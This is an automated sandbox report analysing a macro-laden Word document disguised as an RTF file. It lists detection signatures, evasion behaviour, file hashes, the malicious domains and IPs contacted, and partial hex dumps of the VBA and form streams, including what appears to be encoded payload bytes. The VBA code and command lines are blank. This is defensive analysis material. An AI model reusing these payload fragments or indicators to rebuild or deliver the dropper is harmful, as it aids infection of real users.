Analysis Report
Overview
General Information |
---|
Joe Sandbox Version: | 15.0.0 |
Analysis ID: | 142902 |
Start time: | 16:15:12 |
Joe Sandbox Product: | Cloud |
Start date: | 07.07.2016 |
Overall analysis duration: | 0h 2m 48s |
Report type: | full |
Sample file name: | k-25ss9tv61sm78f_35s.rtf |
Cookbook file name: | Speed Time.jbs |
Analysis system description: | Windows 7 (Office 2013 v14, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36) |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies |
|
Detection: | MAL |
Classification: | mal84.evad.expl.winRTF@6/10@2/3 |
Cookbook Comments: |
|
Warnings: | Show All
|
Detection |
---|
Strategy | Score | Range | Reporting | Detection | |
---|---|---|---|---|---|
Threshold | 84 | 0 - 100 | Report FP / FN |
Classification |
---|
Analysis Advice |
---|
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook |
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook |
Signature Overview |
---|
Click to jump to signature section
Software Vulnerablities: |
---|
Potential document exploit detected (performs DNS queries) | Show sources |
Source: global traffic | DNS query: |
Potential document exploit detected (performs HTTP gets) | Show sources |
Source: global traffic | TCP traffic: |
Potential document exploit detected (unknown TCP traffic) | Show sources |
Source: global traffic | TCP traffic: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: |
Networking: |
---|
Urls found in memory or binary data | Show sources |
Source: k-25ss9tv61sm78f_35s.rtf, 9501638C.jpe.2652.dr, image1.jpe | String found in binary or memory: | ||
Source: image1.jpe | String found in binary or memory: | ||
Source: k-25ss9tv61sm78f_35s.rtf, 9501638C.jpe.2652.dr, image1.jpe | String found in binary or memory: | ||
Source: k-25ss9tv61sm78f_35s.rtf, 9501638C.jpe.2652.dr, image1.jpe | String found in binary or memory: | ||
Source: k-25ss9tv61sm78f_35s.rtf, 9501638C.jpe.2652.dr, core.xml, image1.jpe | String found in binary or memory: | ||
Source: core.xml | String found in binary or memory: | ||
Source: document.xml | String found in binary or memory: | ||
Source: document.xml | String found in binary or memory: | ||
Source: document.xml | String found in binary or memory: | ||
Source: document.xml | String found in binary or memory: | ||
Source: document.xml | String found in binary or memory: | ||
Source: document.xml | String found in binary or memory: | ||
Source: document.xml | String found in binary or memory: | ||
Source: document.xml | String found in binary or memory: | ||
Source: document.xml | String found in binary or memory: | ||
Source: document.xml | String found in binary or memory: | ||
Source: document.xml | String found in binary or memory: | ||
Source: document.xml, theme1.xml | String found in binary or memory: | ||
Source: document.xml | String found in binary or memory: | ||
Source: document.xml | String found in binary or memory: | ||
Source: document.xml | String found in binary or memory: | ||
Source: app.xml | String found in binary or memory: | ||
Source: app.xml | String found in binary or memory: | ||
Source: document.xml | String found in binary or memory: | ||
Source: document.xml | String found in binary or memory: | ||
Source: core.xml | String found in binary or memory: | ||
Source: document.xml | String found in binary or memory: | ||
Source: k-25ss9tv61sm78f_35s.rtf, 9501638C.jpe.2652.dr, image1.jpe | String found in binary or memory: | ||
Source: k-25ss9tv61sm78f_35s.rtf, 9501638C.jpe.2652.dr, image1.jpe | String found in binary or memory: | ||
Source: k-25ss9tv61sm78f_35s.rtf, 9501638C.jpe.2652.dr, image1.jpe | String found in binary or memory: | ||
Source: core.xml | String found in binary or memory: |
Downloads files | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Downloads files from webservers via HTTP | Show sources |
Source: global traffic | HTTP traffic detected: | ||
Source: global traffic | HTTP traffic detected: |
Performs DNS lookups | Show sources |
Source: unknown | DNS traffic detected: |
Tries to download non-existing http data (HTTP/1.1 404 Not Found) | Show sources |
Source: global traffic | HTTP traffic detected: |
Uses a known web browser user agent for HTTP communication | Show sources |
Source: global traffic | HTTP traffic detected: | ||
Source: global traffic | HTTP traffic detected: |
Potential malicious VBS script found (has network functionality) | Show sources |
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: |
Persistence and Installation Behavior: |
---|
Command shell drops VBS files | Show sources |
Source: C:\Windows\System32\cmd.exe | File created: |
Data Obfuscation: |
---|
Obfuscated document found, RTF is a DOCX | Show sources |
Source: k-25ss9tv61sm78f_35s.rtf | Initial file: |
System Summary: |
---|
Checks whether correct version of .NET is installed | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Executable creates window controls seldom found in malware | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Window found: |
Checks if Microsoft Office is installed | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Uses new MSVCR Dlls | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File opened: |
Classification label | Show sources |
Source: classification engine | Classification label: |
Creates files inside the user directory | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Creates temporary files | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File created: |
Executes visual basic scripts | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: |
Reads ini files | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | File read: |
Reads software policies | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key opened: |
Spawns processes | Show sources |
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: unknown | Process created: | ||
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: |
Uses an in-process (OLE) Automation server | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key value queried: |
Document contains embedded VBA macros | Show sources |
Source: k-25ss9tv61sm78f_35s.rtf | OLE indicator, VBA macros: |
Document misses a certain OLE stream usually present in this Microsoft Office document type | Show sources |
Source: k-25ss9tv61sm78f_35s.rtf | OLE stream indicators for Word, Excel, PowerPoint, and Visio: |
Reads the hosts file | Show sources |
Source: C:\Windows\System32\wscript.exe | File read: |
Document contains an embedded VBA macro which executes code when the document is opened / closed | Show sources |
Source: k-25ss9tv61sm78f_35s.rtf | OLE, VBA macro line: |
Document contains an embedded VBA macro which may execute processes | Show sources |
Source: k-25ss9tv61sm78f_35s.rtf | OLE, VBA macro line: |
Document contains an embedded VBA macro with suspicious strings | Show sources |
Source: k-25ss9tv61sm78f_35s.rtf | OLE, VBA macro line: |
Very long command line found | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process created: | ||
Source: C:\Windows\System32\cmd.exe | Process created: |
HIPS / PFW / Operating System Protection Evasion: |
---|
System process connects to network (likely due to code injection or exploit) | Show sources |
Source: C:\Windows\System32\wscript.exe | Network Connect: | ||
Source: C:\Windows\System32\wscript.exe | Network Connect: |
Anti Debugging: |
---|
Creates guard pages, often used to prevent reverse engineering and debugging | Show sources |
Source: C:\Windows\System32\cmd.exe | Memory protected: |
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) | Show sources |
Source: C:\Windows\System32\wscript.exe | System information queried: |
Malware Analysis System Evasion: |
---|
Found a high number of Window / User specific system calls (may be a loop to detect user behavior) | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Window / User API: |
May sleep (evasive loops) to hinder dynamic analysis | Show sources |
Source: C:\Windows\System32\wscript.exe TID: 1296 | Thread sleep time: |
Potential evasive VBS script found (sleep loop) | Show sources |
Source: C:\Windows\System32\cmd.exe | Dropped file: | ||
Source: C:\Windows\System32\cmd.exe | Dropped file: |
Hooking and other Techniques for Hiding and Protection: |
---|
Disables application error messsages (SetErrorMode) | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Process information set: | ||
Source: C:\Windows\System32\wscript.exe | Process information set: |
Language, Device and Operating System Detection: |
---|
Queries the cryptographic machine GUID | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Key value queried: |
Queries the volume information (name, serial number etc) of a device | Show sources |
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: | ||
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: | ||
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: | ||
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: | ||
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: | ||
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: | ||
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: | ||
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: | ||
Source: C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE | Queries volume information: |
Behavior Graph |
---|
Yara Overview |
---|
No Yara matches |
---|
Screenshot |
---|
Startup |
---|
|
Created / dropped Files |
---|
File Path | Type and Hashes |
---|---|
| |
| |
| |
| |
| |
| |
| |
| |
| |
|
Contacted Domains/Contacted IPs |
---|
Contacted Domains |
---|
Name | IP | Active |
---|---|---|
idmaison.net | 94.76.192.140 | true |
ecovalduloir.com | 109.237.253.100 | true |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Country | Flag | ASN | ASN Name |
---|---|---|---|---|
8.8.8.8 | United States | 15169 | GoogleInc | |
94.76.192.140 | United Kingdom | 29550 | SimplyTransitLtd | |
109.237.253.100 | France | 16347 | ADISTASAS |
Static File Info |
---|
General | |
---|---|
File type: | Microsoft Word 2007+ |
TrID: |
|
File name: | k-25ss9tv61sm78f_35s.rtf |
File size: | 111687 |
MD5: | 58258b89e076c4d378436f3b03682402 |
SHA1: | 1f10ad2812c48ceb7d2d2235ea7964a4c7b9bd56 |
SHA256: | edd557fa4e85f7d5429d74b7708607e9bdb848d0a7f55bdad79b163642c44bf6 |
SHA512: | 0179e8dfdcde9b9e79a263549ec0579367312514d8a4eeef9adf2cb0b833d8a7c789dc1b9cc913e399442243c6717b166044e82ca5ac581a34d9ff8aa8f562d7 |
File Icon |
---|
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | True |
Streams with VBA |
---|
VBA File Name: ThisDocument.cls, Stream Size: 25519 |
---|
General | |
---|---|
Stream Path: | VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 25519 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / K . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 00 f0 00 00 00 e4 0f 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff eb 0f 00 00 2f 4b 00 00 00 00 00 00 01 00 00 00 15 e3 ca e0 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code with Deobfuscations |
---|
|
VBA Code |
---|
|
VBA File Name: UserForm1.frm, Stream Size: 1157 |
---|
General | |
---|---|
Stream Path: | VBA/UserForm1 |
VBA File Name: | UserForm1.frm |
Stream Size: | 1157 |
Data ASCII: | . . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . { > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 15 e3 7b 3e 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code with Deobfuscations |
---|
|
VBA Code |
---|
|
Streams |
---|
Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 484 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 484 |
Entropy: | 5.3272379526 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 0 F 1 6 5 7 C 5 - 2 1 D 0 - 4 9 D 7 - 9 B D D - 7 A A 3 E A 5 5 A 5 5 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 A 4 8 A 4 7 C E A 8 0 E A 8 0 E A 8 0 E A 8 0 " . . D P B = " 9 4 9 |
Data Raw: | 49 44 3d 22 7b 30 46 31 36 35 37 43 35 2d 32 31 44 30 2d 34 39 44 37 2d 39 42 44 44 2d 37 41 41 33 45 41 35 35 41 35 35 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42 |
Stream Path: PROJECTwm, File Type: data, Stream Size: 71 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 71 |
Entropy: | 3.29226192431 |
Base64 Encoded: | False |
Data ASCII: | T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . . |
Data Raw: | 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 00 00 |
Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97 |
---|
General | |
---|---|
Stream Path: | UserForm1/\x1CompObj |
File Type: | data |
Stream Size: | 97 |
Entropy: | 3.61064918306 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 291 |
---|
General | |
---|---|
Stream Path: | UserForm1/\x3VBFrame |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 291 |
Entropy: | 4.60507024638 |
Base64 Encoded: | True |
Data ASCII: | V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 2 2 5 . . C l i e n t L e f t = 4 5 . . C l i e n t T o p = 3 3 0 . . C l i e n t W i d t h = 4 7 1 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w n |
Data Raw: | 56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 |
Stream Path: UserForm1/f, File Type: data, Stream Size: 131 |
---|
General | |
---|---|
Stream Path: | UserForm1/f |
File Type: | data |
Stream Size: | 131 |
Entropy: | 3.58523835821 |
Base64 Encoded: | False |
Data ASCII: | . . $ . . . . . . . . . . . . . . . . . . } . . t . . 9 . . . . . . . . . . . . R . . . . . . . . . . . K . Q . . . . . . D B . . . T a h o m a . . . . . . 0 . . . . . h o . . ( . . . . . . . . . . . . . 2 . . . . > . . . . . . L a b e l 1 . . . . . . . . . . |
Data Raw: | 00 04 24 00 08 0c 10 0c 01 00 00 00 ff ff 00 00 01 00 00 00 00 7d 00 00 74 20 00 00 39 16 00 00 00 00 00 00 00 00 00 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 01 cc 00 00 90 01 44 42 01 00 06 54 61 68 6f 6d 61 00 00 01 00 00 00 30 00 00 00 00 01 68 6f 00 00 28 00 f5 01 00 00 06 00 00 80 01 00 00 00 32 00 00 00 a4 3e 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 00 00 00 00 00 |
Stream Path: UserForm1/o, File Type: data, Stream Size: 16036 |
---|
General | |
---|---|
Stream Path: | UserForm1/o |
File Type: | data |
Stream Size: | 16036 |
Entropy: | 3.15372473478 |
Base64 Encoded: | False |
Data ASCII: | . . . > ( . . . q > . . 6 7 , 6 9 , 3 3 , 2 2 8 , 2 3 2 , 1 4 1 , 2 5 4 , 2 2 , 8 3 , 2 3 0 , 9 1 , 8 7 , 2 0 1 , 1 6 , 9 8 , 4 6 , 1 7 7 , 1 4 6 , 9 7 , 3 6 , 1 5 8 , 6 6 , 1 6 5 , 1 7 4 , 1 0 8 , 2 0 9 , 1 0 6 , 4 1 , 1 5 9 , 1 4 7 , 2 1 , 6 0 , 6 9 , 1 6 , 5 0 , 1 0 3 , 7 1 , 4 4 , 5 , 9 , 1 5 , 1 3 4 , 2 0 0 , 7 5 , 2 5 4 , 1 1 6 , 3 9 , 1 9 4 , 2 1 9 , 1 3 5 , 4 9 , 6 6 , 2 5 3 , 2 3 , 2 3 2 , 2 0 0 , 2 1 2 , 1 2 1 , 1 3 8 , 2 0 6 , 1 6 5 , 6 1 , 1 1 8 , 8 7 , 2 0 0 , 1 2 1 , 1 5 2 , 4 4 , 1 0 6 , 2 3 |
Data Raw: | 00 02 84 3e 28 00 00 00 71 3e 00 80 36 37 2c 36 39 2c 33 33 2c 32 32 38 2c 32 33 32 2c 31 34 31 2c 32 35 34 2c 32 32 2c 38 33 2c 32 33 30 2c 39 31 2c 38 37 2c 32 30 31 2c 31 36 2c 39 38 2c 34 36 2c 31 37 37 2c 31 34 36 2c 39 37 2c 33 36 2c 31 35 38 2c 36 36 2c 31 36 35 2c 31 37 34 2c 31 30 38 2c 32 30 39 2c 31 30 36 2c 34 31 2c 31 35 39 2c 31 34 37 2c 32 31 2c 36 30 2c 36 39 2c 31 |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3840 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 3840 |
Entropy: | 4.75359525678 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . |
Data Raw: | cc 61 af 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: VBA/dir, File Type: VAX-order 68K Blit (standalone) executable, Stream Size: 779 |
---|
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | VAX-order 68K Blit (standalone) executable |
Stream Size: | 779 |
Entropy: | 6.43801953066 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . ; Y . . . . J . < . . . . . r s t d o l e > . . . s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . E O f f i c . . E O . f . . i . c 5 . E . . . . . . . E 2 D . F 8 D 0 4 C - 5 . B |
Data Raw: | 01 07 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 d4 fa 3b 59 81 10 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 20 6f 6c 65 3e 00 01 19 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 |
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 7, 2016 16:16:25.611778975 CEST | 49276 | 53 | 192.168.1.15 | 8.8.8.8 |
Jul 7, 2016 16:16:26.538923025 CEST | 53 | 49276 | 8.8.8.8 | 192.168.1.15 |
Jul 7, 2016 16:16:26.570415020 CEST | 49224 | 80 | 192.168.1.15 | 109.237.253.100 |
Jul 7, 2016 16:16:26.570450068 CEST | 80 | 49224 | 109.237.253.100 | 192.168.1.15 |
Jul 7, 2016 16:16:26.570513010 CEST | 49224 | 80 | 192.168.1.15 | 109.237.253.100 |
Jul 7, 2016 16:16:26.571135044 CEST | 49224 | 80 | 192.168.1.15 | 109.237.253.100 |
Jul 7, 2016 16:16:26.571158886 CEST | 80 | 49224 | 109.237.253.100 | 192.168.1.15 |
Jul 7, 2016 16:16:26.696515083 CEST | 80 | 49224 | 109.237.253.100 | 192.168.1.15 |
Jul 7, 2016 16:16:26.696780920 CEST | 49224 | 80 | 192.168.1.15 | 109.237.253.100 |
Jul 7, 2016 16:16:26.772088051 CEST | 53996 | 53 | 192.168.1.15 | 8.8.8.8 |
Jul 7, 2016 16:16:26.850214005 CEST | 53 | 53996 | 8.8.8.8 | 192.168.1.15 |
Jul 7, 2016 16:16:26.851953030 CEST | 49225 | 80 | 192.168.1.15 | 94.76.192.140 |
Jul 7, 2016 16:16:26.852011919 CEST | 80 | 49225 | 94.76.192.140 | 192.168.1.15 |
Jul 7, 2016 16:16:26.852132082 CEST | 49225 | 80 | 192.168.1.15 | 94.76.192.140 |
Jul 7, 2016 16:16:26.852958918 CEST | 49225 | 80 | 192.168.1.15 | 94.76.192.140 |
Jul 7, 2016 16:16:26.852993011 CEST | 80 | 49225 | 94.76.192.140 | 192.168.1.15 |
Jul 7, 2016 16:16:26.992307901 CEST | 80 | 49225 | 94.76.192.140 | 192.168.1.15 |
Jul 7, 2016 16:16:26.992357969 CEST | 80 | 49225 | 94.76.192.140 | 192.168.1.15 |
Jul 7, 2016 16:16:26.992440939 CEST | 49225 | 80 | 192.168.1.15 | 94.76.192.140 |
Jul 7, 2016 16:16:26.992680073 CEST | 49225 | 80 | 192.168.1.15 | 94.76.192.140 |
Jul 7, 2016 16:16:26.992702961 CEST | 80 | 49225 | 94.76.192.140 | 192.168.1.15 |
Jul 7, 2016 16:16:27.286700964 CEST | 49224 | 80 | 192.168.1.15 | 109.237.253.100 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 7, 2016 16:16:25.611778975 CEST | 49276 | 53 | 192.168.1.15 | 8.8.8.8 |
Jul 7, 2016 16:16:26.538923025 CEST | 53 | 49276 | 8.8.8.8 | 192.168.1.15 |
Jul 7, 2016 16:16:26.772088051 CEST | 53996 | 53 | 192.168.1.15 | 8.8.8.8 |
Jul 7, 2016 16:16:26.850214005 CEST | 53 | 53996 | 8.8.8.8 | 192.168.1.15 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jul 7, 2016 16:16:25.611778975 CEST | 192.168.1.15 | 8.8.8.8 | 0x674b | Standard query (0) | ecovalduloir.com | A (IP address) | IN (0x0001) |
Jul 7, 2016 16:16:26.772088051 CEST | 192.168.1.15 | 8.8.8.8 | 0x901d | Standard query (0) | idmaison.net | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Replay Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jul 7, 2016 16:16:26.538923025 CEST | 8.8.8.8 | 192.168.1.15 | 0x674b | No error (0) | ecovalduloir.com | 109.237.253.100 | A (IP address) | IN (0x0001) | |
Jul 7, 2016 16:16:26.850214005 CEST | 8.8.8.8 | 192.168.1.15 | 0x901d | No error (0) | idmaison.net | 94.76.192.140 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Header | Total Bytes Transfered (KB) |
---|---|---|---|---|---|---|
Jul 7, 2016 16:16:26.571135044 CEST | 49224 | 80 | 192.168.1.15 | 109.237.253.100 | 1845 | |
Jul 7, 2016 16:16:26.696515083 CEST | 80 | 49224 | 109.237.253.100 | 192.168.1.15 | 1846 | |
Jul 7, 2016 16:16:26.852958918 CEST | 49225 | 80 | 192.168.1.15 | 94.76.192.140 | 1847 | |
Jul 7, 2016 16:16:26.992307901 CEST | 80 | 49225 | 94.76.192.140 | 192.168.1.15 | 1847 |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 16:15:51 |
Start date: | 07/07/2016 |
Path: | C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | unknown |
Imagebase: | 0xe30000 |
File size: | 1923232 bytes |
MD5 hash: | FEC5FFC0B51C78D9376A74CD2855D479 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 16:30:00 |
Start date: | 07/07/2016 |
Path: | C:\Windows\System32\cmd.exe |
